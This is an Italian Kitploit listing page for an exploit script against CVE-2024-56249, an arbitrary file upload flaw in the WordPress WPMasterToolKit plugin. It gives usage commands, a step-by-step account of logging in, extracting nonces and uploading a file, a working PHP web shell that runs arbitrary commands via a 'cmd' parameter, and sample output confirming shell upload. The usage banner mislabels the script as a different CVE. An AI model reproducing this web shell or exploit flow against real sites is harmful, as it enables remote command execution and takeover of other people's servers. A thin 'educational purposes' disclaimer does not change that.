Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-56249 — WordPress WPMasterToolKit plugin <= 1.13.1 - Vulnerabilità di caricamento file arbitrario | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-56249
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubnxploited/cve-2024-56249

CVE-2024-56249

WordPress WPMasterToolKit plugin <= 1.13.1 - Vulnerabilità di caricamento file arbitrario

Vedi Repository
1111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛠️ Exploit di WordPress Master Toolkit (CVE-2024-56249)

🌟 Panoramica

Questo script sfrutta una vulnerabilità di Caricamento File Arbitrario nel plugin WordPress WPMasterToolKit, consentendo a un attaccante di caricare una web shell sul server. La vulnerabilità esiste nelle versioni <= 1.13.1 del plugin.

📝 Dettagli CVE

CVE ID:CVE-2024-56249
Pubblicato:2025-01-02
Aggiornato:2025-01-02
Descrizione:La vulnerabilità di Caricamento senza restrizioni di file con tipo pericoloso in Webdeclic WPMasterToolKit consente di caricare una Web Shell su un server Web.
CWE:CWE-434: Caricamento senza restrizioni di file con tipo pericoloso (Unrestricted Upload of File with Dangerous Type)
Punteggio CVSS:9.1 (Critico)
Vettore CVSS:CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

🚀 Utilizzo

Per sfruttare questa vulnerabilità, usa il seguente comando:

root@kitploit:~
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>

📋 Parametri

  • -u / --url: URL di WordPress target (ad es., http://192.168.100.74:888/wordpress)
  • -un / --username: Nome utente amministratore WordPress
  • -p / --password: Password amministratore WordPress
  • -fp / --filepath: Percorso di upload del file (predefinito: wp-content/uploads/2025/03)
  • -fn / --filename: Nome del file da caricare (predefinito: shell.php)

🧩 Spiegazione dello Script

🔍 1. Sonda Vulnerabilità

Lo script inizia sondando l'URL target per verificare se è vulnerabile a CVE-2024-56249 controllando la versione del plugin WPMasterToolKit.

🔑 2. Autenticazione a WordPress

Prova quindi ad accedere al pannello di amministrazione di WordPress utilizzando le credenziali fornite.

🛡️ 3. Estrazione dei Token di Sicurezza

Dopo un login riuscito, lo script estrae i token di sicurezza necessari (nonce e token) richiesti per il caricamento del file.

📤 4. Distribuzione del Payload

Carica il file specificato (ad es., una web shell) sul server target utilizzando i token estratti.

✅ 5. Verifica del Caricamento

Infine, lo script verifica se il file è stato caricato con successo controllando la sua accessibilità tramite l'URL target.

📂 Nota

Assicurati che il file shell (ad es., shell.php) sia posizionato nella stessa directory dello script prima di eseguirlo. Questo è necessario affinché lo script possa individuare e caricare correttamente il file.

Esempio di File Shell (shell.php)

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>

💡 Esempio

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php

🖥️ Output

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php

🛠️ Utilizzo dello Script

root@kitploit:~
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]

Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
  -un, --username USERNAME
                        WordPress admin username
  -p, --password PASSWORD
                        WordPress admin password
  -fp, --filepath FILEPATH
                        File upload path (default: wp-content/uploads/2025/03)
  -fn, --filename FILENAME
                        File name to upload (default: shell.php)

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi. Usalo a tuo rischio. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.


Exploit script by Nxploit | Khaled Alenazi

Scarica lo strumento